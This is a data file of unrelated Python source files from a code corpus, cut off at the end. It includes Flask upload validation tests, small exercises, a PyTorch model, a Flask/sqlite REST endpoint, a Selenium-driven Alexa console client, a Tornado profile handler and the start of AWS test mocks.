+{"seq_id":"218253922","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n__author__ = 'g3n35i5'\n\nfrom shopdb.models import *\nfrom shopdb.api import app\nimport shopdb.exceptions as exc\nfrom tests.base_api import BaseAPITestCase\nfrom flask import json\nimport base64\nimport os\n\n\nclass UploadAPITestCase(BaseAPITestCase):\n def test_authorization(self):\n \"\"\"This route should only be available for admins.\"\"\"\n res = self.post(url='/upload', role=None)\n self.assertException(res, exc.UnauthorizedAccess)\n res = self.post(url='/upload', role='user')\n self.assertException(res, exc.UnauthorizedAccess)\n res = self.post(url='/upload', role='admin')\n self.assertException(res, exc.NoFileIncluded)\n self.assertEqual(len(Upload.query.all()), 0)\n\n def test_upload_no_file_included(self):\n \"\"\"A request without any data should raise an error.\"\"\"\n res = self.post(url='/upload', role='admin')\n self.assertException(res, exc.NoFileIncluded)\n self.assertEqual(len(Upload.query.all()), 0)\n\n def test_upload_empty_filename(self):\n \"\"\"A request with an empty filename should raise an error.\"\"\"\n image = {'value': base64.b64encode(b'abc').decode()}\n res = self.post(url='/upload', data=image, role='admin')\n self.assertException(res, exc.InvalidFilename)\n self.assertEqual(len(Upload.query.all()), 0)\n\n def test_upload_no_value_field(self):\n \"\"\"A request without a value should raise an error.\"\"\"\n image = {'filename': 'test.png'}\n res = self.post(url='/upload', data=image, role='admin')\n self.assertException(res, exc.NoFileIncluded)\n self.assertEqual(len(Upload.query.all()), 0)\n\n def test_upload_invalid_extension(self):\n \"\"\"A request with an invalid file extension should raise an error.\"\"\"\n image = {'filename': 'test.abc',\n 'value': base64.b64encode(b'abc').decode()}\n res = self.post(url='/upload', data=image, role='admin')\n self.assertException(res, exc.InvalidFileType)\n self.assertEqual(len(Upload.query.all()), 0)\n\n def test_upload_file_too_large(self):\n \"\"\"A request with an file which is too large should raise an error.\"\"\"\n bytes = b'1' * 6 * 1024 * 1024\n image = {'filename': 'test.png',\n 'value': base64.b64encode(bytes).decode()}\n res = self.post(url='/upload', data=image, role='admin')\n self.assertException(res, exc.FileTooLarge)\n self.assertEqual(len(Upload.query.all()), 0)\n\n def test_upload_invalid_filename(self):\n \"\"\"A request with an invalid file extension should raise an error.\"\"\"\n image = {'filename': '.abc', 'value': base64.b64encode(b'abc').decode()}\n res = self.post(url='/upload', data=image, role='admin')\n self.assertException(res, exc.InvalidFilename)\n self.assertEqual(len(Upload.query.all()), 0)\n\n def test_upload_broken_image(self):\n \"\"\"A request with a broken image should raise an error.\"\"\"\n filepath = app.config['UPLOAD_FOLDER'] + 'broken_image.png'\n with open(filepath, 'rb') as test:\n bytes = test.read()\n image = {'filename': 'broken.png',\n 'value': base64.b64encode(bytes).decode()}\n res = self.post(url='/upload', data=image, role='admin')\n self.assertException(res, exc.BrokenImage)\n self.assertEqual(len(Upload.query.all()), 0)\n\n def test_invalid_filetype_hidden_behind_valid_filename(self):\n \"\"\"A request an invalid file type should raise an error.\"\"\"\n filepath = app.config['UPLOAD_FOLDER'] + 'valid_image.jpg'\n with open(filepath, 'rb') as test:\n bytes = test.read()\n image = {'filename': 'hidden_invalid_filetype.png',\n 'value': base64.b64encode(bytes).decode()}\n res = self.post(url='/upload', data=image, role='admin')\n self.assertException(res, exc.InvalidFileType)\n self.assertEqual(len(Upload.query.all()), 0)\n\n def test_upload_non_quadratic_image(self):\n filepath = app.config['UPLOAD_FOLDER'] + 'non_quadratic.png'\n with open(filepath, 'rb') as test:\n bytes = test.read()\n image = {'filename': 'non_quadratic.png',\n 'value': base64.b64encode(bytes).decode()}\n res = self.post(url='/upload', data=image, role='admin')\n self.assertException(res, exc.ImageMustBeQuadratic)\n self.assertEqual(len(Upload.query.all()), 0)\n\n def test_upload_valid_image(self):\n \"\"\"A request with valid images should work.\"\"\"\n filepath = app.config['UPLOAD_FOLDER'] + 'valid_image.png'\n with open(filepath, 'rb') as test:\n bytes = test.read()\n image = {'filename': 'valid.png',\n 'value': base64.b64encode(bytes).decode()}\n res = self.post(url='/upload', data=image, role='admin')\n self.assertEqual(res.status_code, 200)\n data = json.loads(res.data)\n assert 'message' in data\n assert 'filename' in data\n self.assertEqual(data['message'], 'Image uploaded successfully.')\n assert data['filename'].endswith('png')\n path = os.path.join(app.config['UPLOAD_FOLDER'], data['filename'])\n self.assertTrue(os.path.isfile(path))\n upload = Upload.query.filter_by(filename=data['filename']).first()\n self.assertTrue(upload)\n self.assertEqual(upload.filename, data['filename'])\n self.assertEqual(upload.admin_id, 1)\n # Delete the created file from the upload folder\n os.remove(path)\n","sub_path":"tests/test_api_upload.py","file_name":"test_api_upload.py","file_ext":"py","file_size_in_byte":5572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"137221010","text":"import pygame\n\npygame.init() # 초기화 작업 (반드시 필요)\n\n# 화면 크기 설정\nscreen_width = 480 # 가로 크기\nscreen_height = 640 # 세로 크기\nscreen = pygame.display.set_mode((screen_width, screen_height)) # 화면 크기 설정\n\n# 화면 타이틀 설정\npygame.display.set_caption(\"Heeya Game\") # 게임 이름\n\n# 이벤트 루프 (이걸 해야 게임창이 계속 켜져 있는다)\nrunning = True # 게임이 진행중이가?\nwhile running:\n for event in pygame.event.get(): # 어떤 이벤트가 발생하였는가?\n if event.type == pygame.QUIT: # 창이 닫히는 이벤트가 발생하였는가?\n running = False # 게임이 진행중이 아님\n\n# pygame 종료\npygame.quit()\n","sub_path":"1_create_frame.py","file_name":"1_create_frame.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"449451004","text":"# -*- coding: utf-8 -*-\n\"\"\"\nСоздать текстовый файл (не программно), построчно записать фамилии сотрудников и величину их окладов.\nОпределить, кто из сотрудников имеет оклад менее 20 тыс., вывести фамилии этих сотрудников.\nВыполнить подсчет средней величины дохода сотрудников.\n\"\"\"\n\n\ndef salary_analyze(file_path, salary_thr=20000.0):\n \"\"\"\n Filter list of employees with salary threshold and calculate average salary\n :param file_path: path to file\n :param salary_thr: salary_threshold float\n :return: tuple of list and float\n \"\"\"\n filtered_list = []\n salary_avr = 0\n items_count = 0\n try:\n with open(file_path, 'r') as f:\n for line in f:\n try:\n name, salary = line.split(':')\n salary = float(salary)\n salary_avr += salary\n items_count += 1\n if salary < salary_thr:\n filtered_list.append(name)\n except ValueError as err:\n print('Found some wrong data at line:', line, f'Error {err}')\n except Exception as err:\n print(err)\n salary_avr = salary_avr / items_count if items_count else 0\n return filtered_list, salary_avr\n\n\nif __name__ == '__main__':\n thr = 20000.0\n li, avr = salary_analyze('task3_tmp.txt', thr)\n if len(li):\n print(f'People, who has salary lower than {thr}:')\n for p in li:\n print('\\t', p)\n else:\n print(f'There are no one who has salary lower than {thr}:')\n\n print(f'Salary average is {avr}')\n","sub_path":"hw5/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"162169601","text":"# **************************************************************************** #\n# #\n# ::: :::::::: #\n# q01-searching-for-parts.py :+: :+: :+: #\n# +:+ +:+ +:+ #\n# By: cbaek +#+ +:+ +#+ #\n# +#+#+#+#+#+ +#+ #\n# Created: 2020/10/19 12:37:44 by cbaek #+# #+# #\n# Updated: 2020/10/19 12:51:16 by cbaek ### ########.fr #\n# #\n# **************************************************************************** #\n\n# 실전문제 - 부품 찾기 P.197.\n\n# 이진 탐색 소스코드 구현(반복문)\ndef binary_search(array, target, start, end):\n\twhile start <= end:\n\t\tmid = (start + end) // 2\n\t\t# 찾은 경우 중간점 인덱스 반환\n\t\tif array[mid] == target:\n\t\t\treturn mid\n\t\t# 중간점의 값보다 찾고자 하는 값이 작은 경우 왼쪽 확인\n\t\telif array[mid] > target:\n\t\t\tend = mid - 1\n\t\t# 중간점의 값보다 찾고자 하는 값이 큰 경우 오른쪽 확인\n\t\telse:\n\t\t\tstart = mid + 1\n\treturn None\n\n# N(가게의 부품 개수) 입력\nn = int(input())\n# 가게에 있는 전체 부품 번호를 공백으로 구분하여 입력\narray = list(map(int, input().split()))\narray.sort() # 이진 탐색을 수행하기 위해 사전에 정렬 수행\n# M(손님이 요청한 부품 개수) 입력\nm = int(input())\n# 손님이 확인 요청한 전체 부품 번호를 공백으로 구분하여 입력\nx = list(map(int, input().split()))\n\n# 손님이 확인 요청한 부품 번호를 하나씩 확인\nfor i in x:\n\t# 해당 부품이 존재하는지 확인\n\tresult = binary_search(array, i, 0, n - 1)\n\tif result != None:\n\t\tprint('yes', end=' ')\n\telse:\n\t\tprint('no', end=' ')\n\n# 결과\n# $ python codes/ch07/q01-searching-for-parts.py\n# 5\n# 8 3 7 9 2\n# 3\n# 5 7 9\n# no yes yes\n","sub_path":"codes/ch07/q01-searching-for-parts.py","file_name":"q01-searching-for-parts.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"653554642","text":"from torch.utils.data import Dataset, DataLoader\nfrom torch.optim.lr_scheduler import *\nimport torch.nn.functional as F\nfrom typing import List\nfrom torch import nn\nimport logging\nimport torch\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass DenseNet(nn.Module):\n\n def __init__(self,\n hidden_dims: List[int] = [100, 50], \n dropouts: List[float] = [0.2, 0.2],\n batch_norm: bool = False,\n verbose: bool = True,):\n \n super(DenseNet, self).__init__()\n \n self.hidden_dims = hidden_dims\n self.dropouts = dropouts\n self.batch_norm = batch_norm\n self.verbose = verbose\n self.model = None\n \n def build(self, \n input_size: int, \n output_size: int):\n \n if self.verbose:\n logger.info(\n f\"Building a DenseNet having input size {input_size}, output size {output_size},\"\n )\n logger.info(\n f\"layer sizes {self.hidden_dims}, and dropouts {self.dropouts}\"\n )\n \n self.model_list = []\n self.model_list.append(nn.Linear(input_size, self.hidden_dims[0]))\n if self.batch_norm:\n self.model_list.append(nn.BatchNorm1d(num_features=self.hidden_dims[0]))\n self.model_list.append(nn.LeakyReLU())\n if len(self.hidden_dims) > 1:\n if self.dropouts[0] > 0.0:\n self.model_list.append(nn.Dropout(self.dropouts[0]))\n for i in range(len(self.hidden_dims)-1):\n self.model_list.append(nn.Linear(self.hidden_dims[i], self.hidden_dims[i+1]))\n if self.batch_norm:\n self.model_list.append(nn.BatchNorm1d(num_features=self.hidden_dims[i+1]))\n self.model_list.append(nn.LeakyReLU())\n if self.dropouts[i+1] > 0.0:\n self.model_list.append(nn.Dropout(self.dropouts[i+1]))\n self.model_list.append(nn.Linear(self.hidden_dims[-1], output_size))\n self.model_list.append(nn.Sigmoid())\n self.model = nn.Sequential(*self.model_list)\n\n def forward(self, \n x: torch.FloatTensor):\n \n if self.model is None:\n raise OSError(f\"You must call DenseNet.build before using the model. Exiting.\")\n \n x = self.model(x)\n return x","sub_path":"geckoml/torch/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"620484981","text":"#!flask/bin/python\nfrom flask import Flask, jsonify\napp = Flask(__name__)\nimport sqlite3\nimport re\ndef restout(a):\n connection = sqlite3.connect('/home/maciek/Desktop/Zastepstwascrap/TEST3.db')#LOKALIZACJA BAZY DANYCH\n c = connection.cursor()\n klasa = a\n # klasyrest=klasa[0]+\" \"+klasa[::]\n klasa = klasa[0] + \" \" + klasa[1:]\n print(klasa)\n klasa=klasa+'%'\n c.execute(\"SELECT id FROM zastepstwa WHERE klasa LIKE (?)\", (klasa,))\n rows = c.fetchall()\n\n id=[]\n for i in rows:\n id.append(i[0])\n # nauczycielerest = []\n nauczycielerest = [{},{},{},{},{},{},{},{},{},{},{},{}]\n\n ogloszeniat=[{}]\n if(a==\"ogloszenia\"):\n c.execute('SELECT ogloszenia FROM ogloszenia')\n test = c.fetchall()[0][0]\n result = re.search('Inf', test)\n span = result.span(0)\n span = span[0]\n klasa = test[0:span]\n\n print(test)\n print(klasa)\n ogloszeniat[0]['ogloszenia']=klasa\n\n\n\n # result = re.search('Inf', ogloszeniat[0]['ogloszenia'])\n # span = result.span(0)\n # span = span[0]\n # klasa = ogloszeniat[0]['ogloszenia'][0:span]\n # print(span)\n # span = result.span(0)\n # span = span[0]\n # ogloszeniat[0]['ogloszenia']\n # return klasa\n return ogloszeniat\n # return c.fetchall()[0]\n\n print(id)\n a=0\n for i in id:\n c.execute(\"SELECT nauczycielzastepowany FROM zastepstwa WHERE id=?\", (i,))\n nauczycielzastepowany = c.fetchall()\n nauczycielerest[a]['nauczycielzastepowany'] = nauczycielzastepowany[0][0]\n\n c.execute(\"SELECT lekcja FROM zastepstwa WHERE id=?\", (i,))\n lekcja = c.fetchall()\n nauczycielerest[a]['lekcja'] = lekcja[0][0]\n\n\n c.execute(\"SELECT sala FROM zastepstwa WHERE id=?\", (i,))\n sala = c.fetchall()\n nauczycielerest[a]['sala'] = sala[0][0]\n\n\n # c.execute(\"SELECT data FROM zastepstwa WHERE id=x\"), (i,))\n\n c.execute(\"SELECT zastepca FROM zastepstwa WHERE id=?\", (i,))\n zastepca = c.fetchall()\n nauczycielerest[a]['zastepca'] = zastepca[0][0]\n\n c.execute(\"SELECT klasa FROM zastepstwa WHERE id=?\", (i,))\n klasa= c.fetchall()\n nauczycielerest[a]['klasa']=klasa[0][0]\n # klasat[a]['klasa'] = klasa[0][0]\n\n a=a+1\n return nauczycielerest\n\n@app.route('/zastepstwa/', methods=['GET'])#replace klasa to task_id\ndef get_klasa(klasa):\n a=klasa\n return jsonify(restout(a))\n\napp.run(\n host=app.config.get(\"HOST\", \"0.0.0.0\"),\n port=app.config.get(\"PORT\", 9000)\n)\nif __name__ == '__main__':\n app.run(debug=True)","sub_path":"restOut.py","file_name":"restOut.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"237852760","text":"# encoding=utf8\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf8')\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\nimport pickle\nimport bs4\nimport copy\nimport json\nimport threading\nimport random\nfrom selenium.webdriver.chrome.options import Options\nSIM_URL = \"https://developer.amazon.com/alexa/console/ask/test/amzn1.ask.skill.a00d7304-d36b-4ae0-8352-dd7e8fbc5d79/development/en_US/\"\nCOOKIES = \"myCookies.json\"\nCOOKIES = json.load(open(COOKIES))\nACTIVE_SIMS = []\nALL_SIMS = []\nlock = threading.Lock()\nTHREADS = 3\nANSWERS = {}\nclass simulator(object):\n\t\"\"\"docstring for simulator\"\"\"\n\tdef login(self):\n\t\tself.tempLock.acquire()\n\t\tself.driver.get(SIM_URL)\n\t\tfor cookie in COOKIES:\n\t\t\tif cookie['domain'] == '.amazon.com':\n\t\t\t\tself.driver.add_cookie(cookie)\n\t\tself.driver.get(SIM_URL)\n\t\tself.tempLock.release()\n\n\tdef test_driver(self):\n\t\tself.tempLock.acquire()\n\t\tcount = 0\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tself.driver.find_element_by_css_selector(\"input.askt-utterance__input\").clear()\n\t\t\t\tself.driver.find_element_by_css_selector(\"input.askt-utterance__input\").send_keys(\"alexa what is the weather\")\n\t\t\t\tself.driver.find_element_by_css_selector(\"input.askt-utterance__input\").send_keys(Keys.ENTER)\n\t\t\t\tbreak\n\t\t\texcept:\n\t\t\t\tpass\n\t\t\tif count > 8:\n\t\t\t\tbreak\n\t\t\tcount += 1\n\t\t\ttime.sleep(3)\n\t\t\tself.driver.save_screenshot(\"{}.png\".format(random.randint(1, 50)))\n\t\tself.tempLock.release()\n\t\tif count > 8:\n\t\t\treturn False\n\t\treturn True\n\n\tdef get_response(self):\n\t\ttry:\n\t\t\tpage = bs4.BeautifulSoup(self.driver.page_source, 'lxml')\n\t\t\treturn page.select(\".askt-dialog__message--active-response\")[0].getText()\n\t\texcept:\n\t\t\treturn None\n\n\tdef ask_question(self, question):\n\t\tself.tempLock.acquire()\n\t\tself.driver.find_element_by_css_selector(\"input.askt-utterance__input\").clear()\n\t\tself.driver.find_element_by_css_selector(\"input.askt-utterance__input\").send_keys(question)\n\t\tself.driver.find_element_by_css_selector(\"input.askt-utterance__input\").send_keys(Keys.ENTER)\n\t\tpage_source = self.driver.page_source\n\t\ta = 0\n\t\twhile \"askt-dialog__message askt-dialog__message--spinner\" in str(page_source):\n\t\t\tprint(\"Waiting on question: {} | Working: {} Active: {}\".format(question.replace(\"ask ncr store\", \"\"), len(ALL_SIMS)-len(ACTIVE_SIMS), len(ACTIVE_SIMS)))\n\t\t\ttime.sleep(.1)\n\t\t\tpage_source = self.driver.page_source\n\t\t\ta += 1\n\t\t\tif a > 100:\n\t\t\t\tbreak\n\t\tfor i in range(30):\n\t\t\tx = self.get_response()\n\t\t\tif x != None:\n\t\t\t\tANSWERS[question] = x\n\t\t\t\tself.tempLock.release()\n\t\t\t\treturn\n\t\t\ttime.sleep(.1)\n\t\tANSWERS[question] = \"I'm not really sure about that.\"\n\t\tself.tempLock.release()\n\t\treturn\n\n\tdef refresh_token(self):\n\t\twhile True:\n\t\t\ttime.sleep(random.randint(1, 10)*30)\n\t\t\tlock.acquire()\n\t\t\tself.tempLock.acquire()\n\t\t\tACTIVE_SIMS.append(self.id)\n\t\t\tlock.release()\n\t\t\tprint(\"Refreshing token\")\n\t\t\tself.driver.get(SIM_URL)\n\t\t\tif self.test_driver() == False:\n\t\t\t\tself.driver.quit()\n\t\t\t\tALL_SIMS.append(simulator())\n\t\t\telse:\n\t\t\t\tACTIVE_SIMS.remove(self.id)\n\t\t\tself.tempLock.release()\n\n\tdef __init__(self):\n\t\tself.tempLock = threading.Lock()\n\t\toptions = Options()\n\t\toptions.add_argument('--headless')\n\t\toptions.add_argument('--disable-gpu')\n\t\toptions.add_argument(\"--mute-audio\")\n\t\tself.id = ''.join([str(random.randint(1,9)) for i in range(10)])\n\t\tself.driver = webdriver.Chrome(chrome_options=options)\n\t\tself.driver.set_window_size(1920, 1080)\n\t\tself.login()\n\t\tif self.test_driver() == False:\n\t\t\traise Exception(\"Error on driver...\")\n\t\telse:\n\t\t\tpass\n\t\t\t#threading.Thread(target=self.refresh_token).start()\n\n\n\ndef create_driver():\n\ta = simulator()\n\tALL_SIMS.append(a)\n\ndef setup(threadCount=10):\n\tthread = [threading.Thread(target=create_driver) for i in range(threadCount)]\n\tfor t in thread:\n\t\tt.start()\n\tfor t in thread:\n\t\tt.join()\n\ndef ask_question(question):\n\tmySim = None\n\twhile mySim == None:\n\t\tlock.acquire()\n\t\tfor sim in ALL_SIMS:\n\t\t\tif sim.id not in ACTIVE_SIMS:\n\t\t\t\tACTIVE_SIMS.append(sim.id)\n\t\t\t\tmySim = sim\n\t\t\t\tbreak\n\t\tlock.release()\n\t\ttime.sleep(1)\n\tmySim.ask_question(question)\n\tACTIVE_SIMS.remove(sim.id)\n\ndef ask_questions(listOfQuestions):\n\tthreads = [threading.Thread(target=ask_question, args=(arg,)) for arg in listOfQuestions]\n\tfor thread in threads:\n\t\tthread.start()\n\tfor thread in threads:\n\t\tthread.join()\n\treturn [{\"question\": question, \"answer\": ANSWERS[question]} for question in listOfQuestions]\n\nfrom flask import Flask, Response, request, jsonify\napp = Flask(__name__)\n\n@app.route('/interact', methods=['POST'])\ndef main():\n\tstart = time.time()\n\tquestions = request.form.getlist('question')\n\tresponse = ask_questions(questions)\n\tend = time.time()\n\treturn jsonify({\"response\": response, \"time\": end - start})\n\nif __name__ == \"__main__\":\n setup(THREADS)\n app.run(port=8001, threaded=True)\n\n","sub_path":"startVoice.py","file_name":"startVoice.py","file_ext":"py","file_size_in_byte":4748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"523038915","text":"import random\r\n\r\ndef random_list(length, a, b):\r\n\treturn [random.randint(a,b) for i in range(length)]\r\n\r\ndef comp_two_lists(list1, list2):\r\n\tlike = 0\r\n\tlike_tall = []\r\n\tfor i in list1:\r\n\t\tif i in list2:\r\n\t\t\tif i not in like_tall: #for å unngå kopier\r\n\t\t\t\tlike += 1\r\n\t\t\tlike_tall.append(i)\r\n\treturn like, like_tall\r\n\r\ndef comp_lists(list_of_lists):\r\n\twhile len(list_of_lists)>=2:\r\n\t\tlike, like_tall = comp_two_lists(list_of_lists[0], list_of_lists[1])\r\n\t\tlist_of_lists.pop(0)\r\n\t\tlist_of_lists[0] = like_tall\r\n\treturn like\r\n\r\ndef partall_rekke(list1):\r\n\trekke_liste = []\r\n\tlengde_rekke = 0 #teller sammenhengende rekke\r\n\tlist1.append(1) #koden er feil, så legger til et oddetall til slutt sånn at det funker #jalla\r\n\t\r\n\tfor i in range(len(list1)): \r\n\t\tif list1[i] % 2 == 0:\r\n\t\t\tlengde_rekke += 1\r\n\t\tif i>0:\r\n\t\t\tif not list1[i-1] % 2 == 0 and list1[i]%2==0: #betyr at vi er på starten av en ny partallsrekke\r\n\t\t\t\tstart_pos = i\r\n\t\tif i < len(list1) and list1[i] % 2 == 0:\r\n\t\t\tif not list1[i+1] % 2 == 0: #sjekker om neste tall er partall\r\n\t\t\t\trekke_liste.append((start_pos,lengde_rekke))\r\n\t\t\t\tlengde_rekke = 0\r\n\t\r\n\tlengste_rekke = 0\r\n\tfor rekker in rekke_liste:\r\n\t\tif rekker[1]>lengste_rekke:\r\n\t\t\tlengste_rekke = rekker[1]\r\n\t\t\tstart_pos = rekker[0]\r\n\ttry:\r\n\t\treturn start_pos,lengste_rekke\r\n\texcept:\r\n\t\treturn 'Ingen partall i rekke'\r\n\r\n\r\nprint(partall_rekke([1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,9876543]))\r\n\r\n'''\r\nlist_of_lists = [random_list(10,0,5) for k in range(50)] #30 tilfeldige lister mellom 0 og 50 som er 50 lange]\r\nprint(list_of_lists)\r\nprint(comp_lists(list_of_lists))\r\n'''","sub_path":"tdt4110/Øving 7/sammenhengende_tallrekke.py","file_name":"sammenhengende_tallrekke.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"318483958","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 21 09:30:11 2018\n\n@author: p000495138\n\"\"\"\n\nfrom multiprocessing import Queue\nimport multiprocessing\nimport time\n\nclass Test1Worker(multiprocessing.Process):\n\n def __init__(self,interval,q):\n super(Test1Worker, self).__init__()\n self.interval = interval\n self.q = q\n \n def run(self):\n while True:\n time.sleep(self.interval)\n print(\"Test1Woker:QueuePut\") \n self.q.put((\"TEST1\",\"TEST2\"))\n\n\n\nclass Test2Worker(multiprocessing.Process):\n\n def __init__(self,q):\n super(Test2Worker, self).__init__()\n self.q = q\n \n def run(self):\n while True:\n data = self.q.get()\n print(\"Test2Woker:QueueReadValue\")\n print('Queue[0]:'+data[0])\n print('Queue[1]:'+data[1] )\n\n\ndef main():\n q = Queue()\n jobs = [\n Test1Worker(5,q),\n Test2Worker(q)\n ]\n for j in jobs:\n j.start()\n\nif __name__ == '__main__':\n main()","sub_path":"04_playground/13_multiprocess/d10_test_multiprocess7_classQueue.py","file_name":"d10_test_multiprocess7_classQueue.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"580454446","text":"def is_palindrome(s, init, end):\n\tr = reversed(s)\n\tif(list(r) == list(s)):\n\t\treturn True\n\treturn False\n\n\ntest_cases = int(input())\nfor i in range(test_cases):\n\tstring = input()\n\tif is_palindrome(string,0,len(string)-1):\n\t\tprint(\"YES\", end=' ')\n\t\tif(len(string)%2 == 0):\n\t\t\tprint(\"EVEN\")\n\t\telse:\n\t\t\tprint(\"ODD\")\n\n\telse:\n\t\tprint(\"NO\")\n\n","sub_path":"Python/is_palindrome.py","file_name":"is_palindrome.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"463919844","text":"import sys\r\nimport os\r\nfrom pygccxml import parser\r\n\r\nclass File:\r\n def __init__(self, header_files_drc, location_to_be_written_to , file_to_be_parsed):\r\n self._file_name = file_to_be_parsed\r\n self._file_directory = header_files_drc\r\n self._directory_to_be_written_to = location_to_be_written_to\r\n self._setEnvironment()\r\n self._makeHeaderNameCppName()\r\n\r\n def _setEnvironment(self):\r\n\r\n #gccxml_09_path = os.path.join('/', 'usr', 'bin', 'castxml') ---> CASTXML will be used for C++11 syntax.\r\n generator_path = os.path.join('/', 'usr', 'bin', 'castxml')\r\n generator_name = 'castxml'\r\n\r\n # Configure GCC-XML parser\r\n # config = parser.gccxml_configuration_t(\r\n # gccxml_path=gccxml_09_path, compiler='g++')\r\n xml_generator_config = parser.xml_generator_configuration_t(\r\n xml_generator_path = generator_path,\r\n xml_generator = generator_name,\r\n )\r\n\r\n #Location where sources files are stored and will be written.\r\n # headerFilesDirectory = os.path.join(currentModuleDirectoryPath, '..', 'headerFiles')\r\n # generatedFilesDirectory = os.path.join(currentModuleDirectoryPath, '..', 'generatedFiles')\r\n\r\n #The directory where header files reside.\r\n # self._file_directory = self._headerFilesDirectory + \"\\\\\"\r\n #Parsing source file\r\n self._decls = parser.parse([os.path.join(self._file_directory, self._file_name)], xml_generator_config)\r\n\r\n def _makeHeaderNameCppName(self):\r\n temp_name = self._file_name\r\n index = temp_name.find('.')\r\n temp_name = temp_name[:index]\r\n self._nameWithoutExt = temp_name\r\n temp_name = temp_name + \".cpp\"\r\n self._cppName = temp_name\r\n\r\n def returnGlobalDeclarations(self):\r\n return self._decls\r\n\r\n def returnFilePath(self):\r\n return os.path.join(self._file_directory, self._file_name)","sub_path":"cppGenerator/gccxmlEnv.py","file_name":"gccxmlEnv.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"312149342","text":"from bson.objectid import ObjectId\nimport sclhub.redis_request_handler\nimport sclhub.tools.user\nimport sclhub.tools.blog\n\nclass ProfileHandler(sclhub.redis_request_handler.RedisRequestHandler):\n\tredis = None\n\tloader = None\n\tmongo = None\n\n\tdef initialize(self, redis, loader, mongo):\n\t\tself.redis = redis\n\t\tself.loader = loader\n\t\tself.mongo = mongo\n\tdef get(self, user):\n\t\tuserp = sclhub.tools.user.User(user, self.redis, self.mongo)\n\t\tif userp.profile is not None:\n\t\t\tposts = sclhub.tools.blog.Tape(userp, self.redis, self.mongo)\n\t\t\tposts.load([userp.profile[\"username\"]])\n\t\t\tposts.init_comments(lim=4)\n\t\t\tposts_count = posts.count()\n\n\t\t\tcurrent_user = self.current_user\n\n\t\t\tfriendship = 0\n\t\t\tif (self.mongo.users.notifications.find_one({\"username\":user, \"friend_username\": current_user}) is not None\n\t\t\tor self.mongo.users.notifications.find_one({\"username\":current_user, \"friend_username\": user}) is not None):\n\t\t\t\tfriendship = 1\n\t\t\telif current_user in userp.profile[\"friends\"]:\n\t\t\t\tfriendship = 2\n\n\t\t\tonline_friends = userp.online_friends\n\t\t\tonline = []\n\t\t\tfor onl in online_friends:\n\t\t\t\tonl = onl.decode(\"utf-8\")\n\t\t\t\tif onl != self.current_user:\n\t\t\t\t\tonline_user = sclhub.tools.user.User(onl, None, self.mongo)\n\t\t\t\t\tonline.append(online_user.profile)\n\n\t\t\thtml = self.loader.load(\"index.html\").generate(\n\t\t\t\t\tposts=posts.get(), comment_label_format=self.comment_label_format,\n\t\t\t\t\tcurrent_user=self.current_user, friendship=friendship,\n\t\t\t\t\tprofile=sclhub.tools.user.User(self.current_user, None, self.mongo).profile, online=online, more=(True if posts.count() > posts.limit else False)\n\t\t\t\t)\n\n\t\t\tself.write(html)\n\t\telse:\n\t\t\tself.set_status(400)\n\tdef comment_label_format(self, count):\n\t\tif count == 0:\n\t\t\treturn \"Добавить ответ\"\n\t\telif count < 0:\n\t\t\treturn \"Скрыть ответы\"\n\t\telif count%10 == 1:\n\t\t\treturn \"Показать еще 1 ответ\"\n\t\telif count%10 >=2 and count%10 <=4:\n\t\t\treturn \"Показать еще {} ответа\".format(count)\n\t\telse:\n\t\t\treturn \"Показать еще {} ответов\".format(count)","sub_path":"sclhub/handlers/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"580142465","text":"#\n# All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or\n# its licensors.\n#\n# For complete copyright and license terms please see the LICENSE at the root of this\n# distribution (the \"License\"). All use of this software is governed by the License,\n# or, if provided, by the license below or the license accompanying this file. Do not\n# remove or modify any license notices. This file is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n#\n# $Revision: #2 $\n\nimport dateutil\nimport json\nimport mock\nimport random\nimport unittest\n\nimport boto3\nfrom botocore.exceptions import ClientError\n\nimport stack_info\nimport mock_aws\nfrom errors import ValidationError\n\nMOCK_CLIENT = 'test-client'\n\nMOCK_REGION = 'test-region'\nMOCK_ACCOUNT_ID = 'test-account-id'\nMOCK_STACK_NAME = 'test-stack-name'\nMOCK_STACK_UUID = 'test-stack-uuid'\n\ndef make_stack_arn(stack_name):\n return 'arn:aws:cloudformation:{region}:{account}:stack/{name}/{uuid}'.format(\n region = MOCK_REGION,\n account = MOCK_ACCOUNT_ID,\n name = stack_name,\n uuid = MOCK_STACK_UUID)\n\nMOCK_STACK_ARN = 